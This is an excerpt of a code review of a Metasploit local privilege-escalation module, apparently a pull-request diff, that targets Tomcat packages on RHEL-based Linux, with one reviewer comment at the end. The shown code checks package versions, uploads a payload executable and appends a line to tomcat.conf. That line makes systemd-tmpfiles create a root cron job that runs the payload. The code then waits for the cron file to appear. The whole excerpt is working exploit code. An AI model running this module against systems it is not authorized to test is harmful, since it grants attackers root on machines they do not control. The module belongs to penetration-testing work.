modules/exploits/linux/local/tomcat_rhel_based_temp_priv_esc.rb

```diff
@@ -0,0 +1,184 @@
+    end
+
+    package = package.sub('tomcat-', '').strip
+    # fedora based cleanup
+    package = package.sub(/\.fc\d\d\.noarch/, '')
+    # rhel/centos based cleanup
+    package = package.sub(/\.el\d_\d\.noarch/, '')
+    package = Rex::Version.new(package)
+
+    # The write-up says 6, 7, 8 but doesn't include version numbers. RHEL's writeup says
+    # only 7 is effected, so we're going to go off their write-up.
+    if package.to_s.start_with?('7') && package < Rex::Version.new('7.0.54-8')
+      return CheckCode::Appears("Vulnerable app version detected: #{package}")
+    end
+
+    CheckCode::Safe("Unexploitable tomcat packages found: #{package}")
+  end
+
+  def exploit
+    # Check if we're already root
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    unless writable? tomcat_conf
+      fail_with Failure::BadConfig, "#{tomcat_conf} is not writable"
+    end
+
+    vprint_status("Creating backup of #{tomcat_conf}")
+    @tomcat_conf_content = read_file(tomcat_conf)
+    path = store_loot(
+      tomcat_conf,
+      'text/plain',
+      rhost,
+      @tomcat_conf_content,
+      'tomcat.conf'
+    )
+    print_good("Original #{tomcat_conf} backed up to #{path}")
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    vprint_status("Uploading Payload to #{payload_path}")
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_file_for_cleanup(payload_path)
+
+    # write in our payload execution
+    vprint_status("Writing permission elevation into #{tomcat_conf}")
+
+    cron_job = "/etc/cron.d/#{rand_text_alphanumeric(5..10)}"
+    print_status("Creating cron job in #{cron_job}")
+    # The POC shows 2 options, a cron answer, and copy bash answer.
+    # Initially I attempted to copy our payload, set suid and root owner
+    # however it seemed to need 2 service restart to apply all the permissions.
+    # I never figured out why it was like that, even chaining copying bash in, then
+    # launching the payload from the bash instance etc.  We opt for the cron
+    # which may take 1 additional minute, and rely on cron, but is much more stable
+    cmd_exec("echo 'F #{cron_job} 0644 root root - \"* * * * * root nohup #{payload_path} & \\n\\n\"' >> #{tomcat_conf}")
+    register_file_for_cleanup(cron_job)
+
+    # we now need systemd-tmpfiles to restart
+    print_good("Waiting #{datastore['WfsDelay']} on tmpfiles-setup.service to restart (/usr/bin/systemd-tmpfiles --create)")
+    timer = 0
+    while timer < datastore['WfsDelay']
+      if file? cron_job
+        break
+      end
+
+      print_error("#{cron_job} not found, checking in 10 seconds")
+      Rex.sleep(10)
+      timer += 10
+    end
```

Comment:
This looks like it would be a good use for https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/retry.rb#L8